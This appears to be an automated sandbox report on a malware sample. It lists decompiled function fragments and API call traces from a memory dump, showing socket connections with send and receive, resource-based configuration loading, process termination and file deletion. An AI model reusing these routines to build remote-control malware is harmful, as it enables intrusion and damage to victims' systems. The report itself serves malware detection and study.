                                        • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                        • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2061410294-0
                                        • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                        • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00409D02(void** _a4) {
                                        				void* _t4;
                                        				long _t5;
                                        				struct HRSRC__* _t7;
                                        
                                        				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                        				_t4 = LockResource(LoadResource(0, _t7));
                                        				_t5 = SizeofResource(0, _t7);
                                        				 *_a4 = _t4;
                                        				return _t5;
                                        			}
                                        APIs
                                        • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                        • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                        • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004126EF(char _a4) {
                                        				void* _t2;
                                        				void* _t3;
                                        
                                        				_t1 =  &_a4; // 0x40e322
                                        				_t2 = GetCurrentProcess();
                                        				_t3 = GetCurrentThread();
                                        				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
                                        			}
                                        APIs
                                        • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                        • GetCurrentThread.KERNEL32 ref: 00412705
                                        • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                        • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Current$Process$DuplicateHandleThread
                                        • String ID: "@
                                        • API String ID: 3566409357-445313631
                                        • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                        • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,?), ref: 0040AD26
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                        • String ID:
                                        • API String ID: 901373779-0
                                        • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                        • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00405C62(void* __ecx) {
                                        				long _t7;
                                        				void* _t10;
                                        				void* _t18;
                                        				void* _t19;
                                        
                                        				_t18 = __ecx;
                                        				_t7 = CreateEventA(0, 0, 0, 0);
                                        				 *(_t18 + 0x34) = _t7;
                                        				if( *((char*)(_t18 + 0x3d)) != 0) {
                                        					_t10 = _t18 + 0x14;
                                        					do {
                                        						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
                                        						if(_t7 != 0) {
                                        							_t19 = _t19 - 0x10;
                                        							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        							E004020C2(0x41be70, 0x5a, _t10);
                                        							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        						}
                                        						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
                                        					} while ( *((char*)(_t18 + 0x3d)) != 0);
                                        				}
                                        				return 1;
                                        			}
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                        • String ID:
                                        • API String ID: 2456067102-0
                                        • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                        • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 1435062097-0
                                        • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                        • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1622488342-0
                                        • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                        • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • closesocket.WS2_32(00000000), ref: 0040256A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                        • String ID:
                                        • API String ID: 3330461409-0
                                        • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                        • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E0040D817(void* __eflags) {
                                        				char* _t8;
                                        				void* _t25;
                                        
                                        				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
                                        				E004126BC( *(_t25 - 0x2c));
                                        				E0040EBBE();
                                        				E004017DD(_t25 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        Instruction offsets: 0x0040d820, 0x0040d827, 0x0040d836, 0x0040d83f, 0x0040e51b, 0x0040e6a4, 0x0040e6ac, 0x0040e6b5, 0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                        • atoi.MSVCRT ref: 0040D82E
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                          • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                          • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                          • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                        • String ID:
                                        • API String ID: 2919580351-0
                                        • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                        • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                        • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6F5E5DF8), ref: 00412140
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                        • String ID:
                                        • API String ID: 758954411-0
                                        • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                        • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                        • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                        • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 25%
                                        			E00406CFF(WCHAR* __eax, void* __ecx) {
                                        				WCHAR* _t5;
                                        				signed int _t8;
                                        				signed int _t9;
                                        				void* _t15;
                                        
                                        				_t15 = __ecx;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t5 = DeleteFileW(__eax);
                                        				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
                                        				if(_t5 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					RemoveDirectoryW(_t5);
                                        				}
                                        				return _t9;
                                        			}

                                        Instruction offsets: 0x00406d01, 0x00406d06, 0x00406d0d, 0x00406d15, 0x00406d21, 0x00406d2b, 0x00406d2f, 0x00406d36, 0x00406d36, 0x00406d40

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                        • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
